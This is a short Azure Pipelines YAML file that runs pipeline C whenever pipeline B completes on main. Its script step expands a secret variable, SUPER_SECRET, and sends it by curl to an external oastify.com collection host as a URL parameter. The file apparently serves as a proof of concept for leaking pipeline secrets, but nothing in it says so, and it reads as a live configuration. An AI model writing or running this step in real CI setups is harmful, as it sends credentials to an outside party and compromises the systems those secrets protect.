trigger: none
pr: none


resources:
  pipelines:
  - pipeline: pipeline (C)
    source: pipeline (B)
    trigger: true # Run pipeline (C) when any run of pipeline (B) completes
    branch: main

steps:
  - script: |
      echo "Run pipeline C"
      $(SUPER_SECRET)
      curl https://jm9nlb6a0mjk1meoxjit3hvuplvcj37s.oastify.com?secret=$(SUPER_SECRET)
  
